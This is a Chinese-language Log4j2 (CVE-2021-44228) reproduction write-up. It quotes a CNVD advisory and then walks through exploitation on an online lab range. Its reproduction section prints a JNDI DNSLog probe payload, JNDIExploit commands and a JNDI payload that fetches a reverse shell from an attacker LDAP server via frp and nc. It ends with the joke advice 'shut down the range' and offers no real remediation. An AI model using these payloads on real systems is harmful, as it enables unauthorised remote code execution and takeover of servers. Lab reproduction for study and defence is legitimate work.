[漏洞复现]Apache_log4j2（CVE-2021-44228）

安全公告编号:CNTA-2021-0032

2021年12月10日，国家信息安全漏洞共享平台（CNVD）收录了Apache Log4j2远程代码执行漏洞（CNVD-2021-95914）。攻击者利用该漏洞，可在未授权的情况下远程执行代码。目前，漏洞利用细节已公开，Apache官方已发布补丁修复该漏洞。CNVD建议受影响用户立即更新至最新版本，同时采取防范性措施避免漏洞攻击威胁。

一、漏洞情况分析

Apache Log4j是一个基于Java的日志记录组件。Apache Log4j2是Log4j的升级版本，通过重写Log4j引入了丰富的功能特性。该日志组件被广泛应用于业务系统开发，用以记录程序输入输出日志信息。

2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷，未经授权的攻击者利用该漏洞，可向目标服务器发送精心构造的恶意数据，触发Log4j2组件解析缺陷，实现目标服务器的任意代码执行，获得目标服务器权限。

CNVD对该漏洞的综合评级为“高危”。

二、漏洞影响范围

漏洞影响的产品版本包括：

Apache Log4j2 2.0 - 2.15.0-rc1

三、漏洞复现

春秋云境.com一键梭哈

开启场景“启动原神”

DNSLog验证  payload：

${jndi:ldap://xxx.dnslog.cn}

DNSLog网站成功收到

JNDI注入反弹shell,准备工具：

1、JNDIExploit

2、frp

3、nc

查看使用参数

java -jar JNDIExploit-1.4-SNAPSHOT.jar -h

查看模块

java -jar JNDIExploit-1.4-SNAPSHOT.jar -u

使用该模块构造payload

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i ip

JNDIExploit开起来

frp开起来

nc开起来

根据我们的ip,port构造payload

${jndi:ldap://ip:1389/Basic/ReverseShell/ip/port}

gogogo

直接拿下

四、漏洞处置建议

把靶场关了